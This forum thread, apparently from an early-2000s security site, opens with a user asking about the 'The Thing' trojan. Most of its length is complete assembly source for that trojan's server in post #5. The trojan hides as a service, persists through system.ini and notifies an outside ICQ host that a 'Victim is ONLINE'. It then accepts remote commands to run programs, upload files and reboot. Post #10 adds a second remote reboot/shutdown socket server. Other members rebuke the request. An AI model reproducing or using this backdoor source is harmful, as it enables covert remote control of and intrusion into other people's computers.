Page 1 of 2 12 LastLast
Results 1 to 10 of 12

Thread: "The Thing" like Trojans

  1. #1

    Question "The Thing" like Trojans

    "The thing", nice trojan (6 Kb) with icq notify, download and execute another application properties. Also can be embed in a html file with hex encoding (godmessage).

    Are there any Assembly coded trojans out there? Also is there anyone use "the thing" in XP or 2K?

  2. #2
    searching for trojan horses---------------------->go to hell

  3. #3
    I`m already there!

  4. #4
    Senior Member
    Join Date
    Aug 2002
    Posts
    310
    If I thought you were using this info for security purposes,I'd help,but the way you speak so highly of this trojan suggests to me that's not your intention.This is not a skiddy site,it's a security site.If you'd like to learn something by all means stick around,but if you want to deface web sites and put bugs in peoples computers I'd suggest getting in the shower and practicing keeping a good grip on the soap,because you'll probably need that knowledge soon.
    [shadow]I don\'t believe in anarchy.If you\'re not smart enough to beat the system it\'s your problem. [/shadow]


  5. #5
    i`m not a kiddy anyway. Give me the percentage of visitors that knows Assembly, C++ and Vbscript, %1, %5 max %10. also most of the visitors use those information to spy their girlfriends email account. So don`t **** my mind with "use this information for educational purposes only blah blah blah.." I`ve asked trojan for monitor that files activity. "Analyzing Examples" basic step of the Software engineering, remember?


    ; the tHing 1.6 server

    .486P
    Locals
    jumps

    .Model Flat ,StdCall

    SOCKET_ERROR equ -1

    WSAdata STRUCT
    wVersion WORD ?
    wHighVersion WORD ?
    szDescription BYTE ?
    szSystemStatus BYTE ?
    iMaxSockets WORD ?
    iMaxUdpDg WORD ?
    lpVendorInfo DWORD ?
    WSAdata ENDS

    sockaddr_in STRUCT
    sin_family WORD 0
    sin_port WORD 0
    sin_addr DWORD 0
    sin_zero BYTE 8 dup (0)
    sockaddr_in ENDS

    INADDR_ANY equ 000000000h
    AF_INET equ 2
    max_size equ 1024


    mb_ok equ 0 ;mb_ok gets the value "0"
    hWnd equ 0
    lpText equ offset text ;set a pointer to the text
    lpCaption equ offset caption ;set a pointer to the caption


    ; declaration of all used API-functions
    extrn WSAStartup : proc
    extrn WSACleanup : proc
    extrn WSAGetLastError : proc
    extrn htons : proc
    extrn bind : proc
    extrn socket : proc
    extrn listen : proc
    extrn accept : proc
    extrn connect : proc
    extrn inet_addr : proc
    extrn send : proc
    extrn recv : proc
    extrn closesocket : proc
    extrn gethostname : proc
    extrn gethostbyname : proc
    extrn inet_ntoa : proc
    extrn Sleep : proc


    extrn ExitProcess : PROC ;procedure to shut down a process
    extrn MessageBoxA : PROC ;procedure to show a MessageBox
    extrn GetModuleHandleA : PROC
    extrn GetProcAddress : PROC
    extrn GetCurrentProcessId : PROC
    extrn ExitWindowsEx : proc
    extrn ShellExecuteA : proc
    extrn GetWindowsDirectoryA : proc
    extrn lstrcmp : proc
    extrn lstrlen : proc
    extrn lstrcat : proc
    extrn lstrcpy : proc
    extrn CreateFileA : proc
    extrn OpenFile : proc
    ;extrn ReadFile : proc
    extrn WriteFile : proc
    extrn CloseHandle : proc
    extrn GetCommandLineA : proc
    extrn CopyFileA : proc
    extrn GetLastError : proc
    extrn GetUserNameA : proc
    extrn MessageBeep : proc
    extrn WritePrivateProfileStringA: proc

    ; here begins our Data

    .Data

    wsa WSADATA ?

    sa dw AF_INET ; Family
    sockport db 0,0 ; TCP Port
    sockip db 0,0,0,0 ; IP Address
    db 8 dup(0) ; zero stuff.


    xsysini db 'explorer.exe ',0
    xsys db 'system.ini',0
    xboot db 'boot',0
    xshell db 'shell',0
    xsysadd db '\',0


    newpath db 100 dup (0)
    exename db 100 dup (0)


    ;// icq

    icqp db '205.188.147.55',0
    db 10 dup(0)
    portis db '+,+Port+:+',0
    passis db '+,+Password+:+',0

    xport db '00000',0
    to db '&to=',0
    endicq db ' HTTP/1.0',0
    eol db 13,10,13,10,13,10,0

    sysname db 'netlog.exe',0
    db 5 dup (0)
    icq db '29839368',0
    db 5 dup (0)
    passw db 'fc',0
    db 10 dup (0)
    nick db 'slave',0
    db 10 dup (0)

    port dd 6000
    conn_socket dd 0
    data_socket dd 0
    server sockaddr_in <0,0,0,0>
    client sockaddr_in ?
    text2 db 30 dup (0)
    saddrlen dw 16
    db 16 dup (0)

    buff db 1030 dup (0)

    starticq db 'GET /scripts/WWPMsg.dll?from=Blade&fromemail=',0
    nexticq db '&subject=+tHe+tHing+1.6&body=Victim+is+ONLINE+',0

    h1 dd 0
    h2 dd 0
    packets dd 0
    packet dd 0
    pas db 0
    f dd 0
    i dd 0
    how dd 0

    text db "Cannot initialize socket.",0 ; error
    mesaj db "the tHing 1.6 server.",0
    _spawn db "spawned.",0
    _kill db "server killed.",0
    _disc db "disconnected.",0
    _upload db "uploaded.",0
    _write db '.',0
    invalid db 'invalid password.',0
    _ok db 'password accepted.',0
    sysini2 db 'explorer.exe ',0
    myip db '127.0.0.1',0

    caption db "Error",0 ;Captionstring, 0-terminated

    Kernel32 db "Kernel32.dll",0
    RSP db "RegisterServiceProcess",0

    icqip db '205.188.147.55',0
    db 10 dup(0)

    .Code


    Main:

    push offset Kernel32
    call GetModuleHandleA ; get the handle of kernel32.dll
    push offset RSP
    push eax
    call GetProcAddress ; get the address of the function
    mov ebx, eax ; save the pointer into ebx
    call GetCurrentProcessId ; get the current process's id
    push 1 ; 1 = Register as Service
    push eax ; process id
    call ebx ; call RegisterServiceProcess


    call GetCommandLineA ; get parameters (exe name)
    mov esi,eax
    inc esi


    mov edi,offset exename
    conv:
    mov al,byte ptr [esi]
    cmp al,22h
    jz terminat
    mov byte ptr [edi],al

    inc esi
    inc edi
    jmp conv

    terminat:

    ; // moving part

    call GetWindowsDirectoryA,offset newpath,100
    call lstrcat,offset newpath,offset sysadd
    call lstrcat,offset newpath,offset sysname

    call CopyFileA,offset exename,offset newpath,0

    call lstrcpy,offset buff,offset sysini
    call lstrcat,offset buff,offset sysname
    call WritePrivateProfileStringA,offset boot,offset shell,offset buff,offset sys


    try_again:mov pas,0

    call WSAStartup,202h,offset wsa
    cmp eax,SOCKET_ERROR
    jnz gata

    error:

    call closesocket,conn_socket
    call closesocket,data_socket
    call WSAcleanup
    call Sleep,300
    jmp try_again



    gata:
    ; // icq notification

    call socket, 2, 1, 0
    cmp eax,-1
    jz error


    mov conn_socket,eax

    mov cx,200
    mov edi,offset buff
    iary: dec cx
    inc edi
    mov byte ptr [edi],0
    cmp cx,0
    jnz iary

    call htons,80

    mov [server.sin_family],AF_INET
    mov [server.sin_port],ax

    call inet_addr,offset icqip
    cmp eax,-1
    jz error
    mov [server.sin_addr],eax

    call connect,conn_socket,offset server,16
    cmp eax,-1
    jz error

    mov byte ptr buff,0

    call lstrcpy,offset buff,offset starticq
    call lstrcat,offset buff,offset xnick
    call lstrcat,offset buff,offset nexticq
    call lstrcat,offset buff,offset passis
    call lstrcat,offset buff,offset passw
    call lstrcat,offset buff,offset portis
    call lstrcat,offset buff,offset xport
    ;// Call GetUserNameA,offset username,50
    ;// call lstrcat,offset buff,offset useris


    call lstrcat,offset buff,offset to
    call lstrcat,offset buff,offset icq
    call lstrcat,offset buff,offset endicq


    call lstrcat,offset buff,offset eol

    call lstrlen,offset buff
    call send,conn_socket,offset buff,eax,0
    cmp eax,-1
    jz error

    call closesocket,conn_socket


    ; end of ICQ


    start_listen:
    ; // start of server listen

    call socket, 2, 1, 0

    cmp eax,0
    jb error
    mov conn_socket,eax


    call htons,6000

    mov [server.sin_family],AF_INET
    mov [server.sin_port],ax
    mov [server.sin_addr],0


    call bind, conn_socket, offset server, 16
    cmp eax,-1
    jz error

    push 5
    push conn_socket
    call listen
    cmp eax,-1
    jz error
    mov data_socket,0

    again:
    mov byte ptr buff,0
    cmp data_socket,0
    jnz after


    call accept,conn_socket,offset client,offset saddrlen
    cmp eax,-1
    jz error
    mov data_socket,eax
    mov pas,0

    call send,data_socket,offset mesaj,22,0
    cmp eax,-1
    jz error

    mov cx,12
    mov edi,offset buff
    iarx: dec cx
    inc edi
    mov byte ptr [edi],0
    cmp cx,0
    jnz iarx

    call recv,data_socket,offset buff,12,0
    cmp eax,-1
    jz error

    call lstrcmp,offset buff,offset passw
    cmp eax,0
    jz ok

    call send,data_socket,offset invalid,17,0
    cmp eax,-1
    jz error
    mov data_socket,0

    jmp again

    ok: call send,data_socket,offset _ok,18,0
    after: cmp pas,0
    jnz upload_2

    mov cx,200
    mov edi,offset buff
    iar: dec cx
    inc edi
    mov byte ptr [edi],0
    cmp cx,0
    jnz iar

    call recv,data_socket,offset buff,200,0
    cmp eax,-1
    jz error

    mov al,byte ptr buff

    ; QUIT (kill server)

    cmp al,'Q'
    jz quit

    ; Reboot the computer

    cmp al,'R'
    jz Reboot

    ; Spawn program

    cmp al,'S'
    jz Spawn


    ; Get Windows Directory

    cmp al,'W'
    jz WinDir

    ; Upload File (expect U;filename;fsize)
    cmp al,'U'
    jz Upload

    ; Disconnect
    cmp al,'D'
    jz disconnect


    jmp again

    Disconnect:
    call send,data_socket,offset _disc,14,0
    cmp eax,-1
    jz error
    call closesocket,data_socket

    mov data_socket,0
    jmp again


    Upload_2:

    mov eax,packet
    cmp eax,packets
    jl read
    jmp close_file
    read:
    call recv,data_socket,offset buff,max_size,0
    cmp eax,-1
    jz error

    mov how,eax
    add packet,eax

    call WriteFile,f,offset buff, how, offset i,0
    cmp eax,-1
    jz error

    call send,data_socket,offset _write,1,0
    cmp eax,-1
    jz error

    jmp again

    close_file:
    mov pas,0
    mov packets,0

    call send,data_socket,offset _upload,9,0
    cmp eax,-1
    jz error
    call CloseHandle,f

    jmp again

    Upload:
    mov edi,offset buff+2
    mov esi,edi
    here:
    cmp byte ptr [edi],';'
    jz _gata
    inc edi
    jmp here

    _gata: mov byte ptr [edi],0

    ; at this moment edi+1 = offset to filezise
    ; esi = offset to filename terminated in zero

    ; must convert filesize to integer

    push esi

    xor ecx,ecx
    inc edi
    call lstrlen,edi

    _again:
    xor edx,edx
    mov dl,byte ptr [edi]
    sub dl,"0" ; subtrack each digit with "0" to convert it to hex value
    mov esi,eax
    dec esi
    push eax
    mov eax,edx
    push ebx
    mov ebx,10

    _iar:cmp esi,0
    jbe __gata

    mul ebx
    dec esi


    jmp _iar
    __gata:
    pop ebx
    add ecx,eax
    pop eax
    inc edi
    dec eax
    cmp eax,0
    jnz _again




    mov eax,ecx ; converted (ax contains fsize)


    mov packet,0
    mov packets,eax

    mov pas,1

    pop esi


    call CreateFileA,esi,40000000h,1,0,2,20h,0

    mov f,eax
    jmp again


    WinDir:
    call GetWindowsDirectoryA,offset buff,100

    mov edi,offset buff
    mov al,0
    mov ecx,0FFFFFFFFh
    repne scasb
    sub ecx,0FFFFFFFFh
    neg ecx
    dec ecx
    mov eax,ecx


    call send,data_socket,offset buff,eax,0
    cmp eax,-1
    jz error
    jmp again


    Spawn:
    call ShellExecuteA,0,0,offset buff+2,0,0,0
    mov byte ptr buff,0
    cmp eax,32
    jl again
    call send,data_socket,offset _spawn,8,0
    cmp eax,-1
    jz error
    jmp again

    Reboot:
    call ExitWindowsEx,6,offset port
    quit: jmp next

    sysini db 'explorer.exe ',0
    sys db 'system.ini',0
    boot db 'boot',0
    shell db 'shell',0
    sysadd db '\',0
    xnick db 'neo',0
    db 10 dup (0)

    useris db ',+username+:+'
    username db 50 dup (0)



    next:
    call WritePrivateProfileStringA,offset boot,offset shell,offset sysini2,offset sys

    call send,data_socket,offset _kill,15,0
    call closesocket,data_socket
    call closesocket,conn_socket
    call ExitProcess

    End Main ;End of code, Main is the entrypoint

  6. #6
    Senior Member
    Join Date
    Aug 2002
    Posts
    310
    I'd actually say 10%+.There's a very high number of professionals(network,security,programming,and so on) on this site compared to most "security" sites.Even the people who aren't into computers as a profession are still intelligent and trying to learn without going the illegal route.So,I'll give you the "for educational purposes only blah blah blah."That's what this site's here for EDUCATION on how to stop people from putting crap like that on their computer.

    I'm sure some people in here do use the info to spy on their girlfriends Email account,but most people in here try not to contribute to it if they can help it,but since there's no way to read someone's intentions without them telling you their intentions,all we can do is try.
    [shadow]I don\'t believe in anarchy.If you\'re not smart enough to beat the system it\'s your problem. [/shadow]


  7. #7
    Grow up and dont waste our time trying to get trojan info so u can hack into others pc's.
    I love pizza...........Do you?

  8. #8
    the attachment is a cool tut about trojans (how they work and how to remove,how they auto start and..)i thought it might be useful for those who read this thread!

    by the way Utreise neggin me won't get ya anywhere brah.
    read the faq(trojans are considerd lammmmmmmmmme)
    -----------------------------------------------------------------------------------------------------------------------

  9. #9
    Senior Member
    Join Date
    Oct 2002
    Posts
    221
    If you are a smart person, which i really doubt. I would not post anything that has to do with finding a way to harm other peoples computers. Like everybody has been telling you this is a security site not a skiddy. We all may disagree with what somebody says sometimes, but in the end we get together to learn and teach each other. If you are going to come in here thinking that we will use our knowledge to help you harm an innocent person, well my friend you have a lot of re-thinking to do.

  10. #10
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,785
    ***************
    Give me the percentage of visitors that knows Assembly, C++ and Vbscript, %1, %5 max %10
    ***************

    Utreise this isn't a flame, im following this thread to see if i can learn anything from it myself, but nobody knows you. you ask how many people here know anything, but just how much do you know. if you know anything at all, than you know 99% are full of ****. I don't 'think' you are, but i don't know that.

    really, does posting code really say anything?

    .386
    .model flat,stdcall
    option casemap:none

    CreateSocket PROTO :DWORD

    inv equ invoke

    include \masm32\include\windows.inc
    include \masm32\include\kernel32.inc
    include \masm32\include\user32.inc
    include \masm32\include\shell32.inc
    include \masm32\include\wsock32.inc
    includelib \masm32\lib\kernel32.lib
    includelib \masm32\lib\user32.lib
    includelib \masm32\lib\shell32.lib
    includelib \masm32\lib\wsock32.lib

    .const

    X_Win equ 160
    Y_Win equ 090
    port equ 25
    WM_SOCKET equ WM_USER+100
    ICON equ 1

    RESTART equ 0
    SHUTDOWN equ 1
    SYSLOCKUP equ 2

    .data

    szShutdown db "Shutdown", 0
    szRestart db "Restart", 0
    szDunno db "I don't know this msg", 0

    ClassName db "Win32ASM_Class", 0
    AppName db "Server", 0

    wc WNDCLASSEX <SIZEOF WNDCLASSEX, CS_HREDRAW or CS_VREDRAW, offset WndProc, \
    NULL, NULL, NULL, NULL, NULL, COLOR_WINDOW + 1, NULL, \
    offset ClassName, NULL>

    szConnect db "Connection esthablished", 0
    e**** db "Something went wrong!", 0

    .data?

    hInstance dd ?
    hwnd dd ?
    X_Pos dd ?
    Y_Pos dd ?
    msg MSG <?>
    sin sockaddr_in <?>
    sSocket dd ?
    wsadata WSADATA <?>
    bRead dd ?
    available_data dd ?
    cSocket dd ?

    .code
    start:
    inv GetModuleHandle, NULL
    mov hInstance, eax
    mov wc.hInstance, eax
    inv LoadIcon, hInstance, ICON
    mov wc.hIcon, eax
    mov wc.hIconSm, eax
    inv LoadCursor, NULL, IDC_ARROW
    mov wc.hCursor, eax
    inv RegisterClassEx, offset wc
    inv GetSystemMetrics,SM_CXSCREEN ; Calculate Screen center
    shr eax, 1
    sub eax, X_Win / 2
    mov X_Pos, eax
    inv GetSystemMetrics,SM_CYSCREEN
    shr eax, 1
    sub eax, Y_Win / 2
    mov Y_Pos, eax
    inv CreateWindowEx, NULL, offset ClassName, offset AppName, WS_OVERLAPPEDWINDOW, \
    X_Pos, Y_Pos, X_Win, Y_Win, NULL, NULL, hInstance, NULL
    mov hwnd, eax
    inv ShowWindow, eax, SW_SHOW
    inv UpdateWindow, hwnd

    .while TRUE
    inv GetMessage, offset msg, NULL, 0, 0
    .break .if (!eax)
    inv TranslateMessage, offset msg
    inv DispatchMessage, offset msg
    .endw

    inv ExitProcess, msg.wParam

    ; Window Proc
    WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
    .if uMsg == WM_DESTROY
    inv closesocket, sSocket
    inv WSACleanup
    inv PostQuitMessage, NULL

    .elseif uMsg == WM_CREATE
    inv WSAStartup, 101h, offset wsadata
    inv CreateSocket, hWnd

    .elseif uMsg == WM_SOCKET
    mov eax, wParam
    mov cSocket, eax
    mov eax, lParam

    .if ax == FD_ACCEPT
    inv accept, sSocket, 0, 0

    .elseif ax == FD_READ
    inv ioctlsocket, cSocket, FIONREAD, offset available_data
    .if eax == NULL
    inv GlobalAlloc, GMEM_FIXED + GMEM_ZEROINIT, available_data
    mov bRead, eax
    inv recv, cSocket, bRead, available_data, 0
    mov available_data, eax
    ; inv MessageBox, hWnd, bRead, bRead, MB_OK
    mov esi, bRead
    cld
    lodsb

    .if al == RESTART
    inv ExitWindowsEx, EWX_REBOOT, 0
    .elseif al == SHUTDOWN
    inv ExitWindowsEx, EWX_SHUTDOWN, 0
    .else
    inv MessageBox, hWnd, offset szDunno, offset AppName, MB_OK
    .endif

    inv GlobalFree, bRead
    .else
    inv MessageBox, hWnd, offset e****, offset e****, MB_OK
    .endif
    .endif

    .else
    inv DefWindowProc, hWnd, uMsg, wParam, lParam
    ret
    .endif

    xor eax,eax
    ret
    WndProc endp

    CreateSocket proc hWnd:DWORD
    mov sin.sin_family, AF_INET
    inv htons, port
    mov sin.sin_port, ax
    inv socket, PF_INET, SOCK_STREAM, 0
    mov sSocket, eax
    inv WSAAsyncSelect, sSocket, hWnd, WM_SOCKET, FD_ACCEPT + FD_CLOSE + FD_READ
    inv bind, sSocket, offset sin, SIZEOF sin
    inv listen, sSocket, 2
    ret
    CreateSocket endp

    end start
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •